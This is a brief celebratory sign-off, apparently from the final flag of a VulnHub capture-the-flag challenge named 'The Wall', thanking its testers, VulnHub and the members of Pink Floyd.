This is it! The Final Cut! Let’s raise the flag!
If you had a crack at solving The Wall, I hope you enjoyed the challenge. I had a great time creating it. :)
Big shoutout to @rastamouse and @thecolonial for being test bunnies; appreciate your help guys.
@vulnhub; thank you so much for hosting these challenges for us all!
.. and last but not least, Syd Barrett (RIP), Nick Mason, Roger Waters, Richard Wright (RIP), and David Gilmour. Thank you for 50 years of absolutely amazing tunes… rock on!!!
Until next time, tight lines and happy hacking.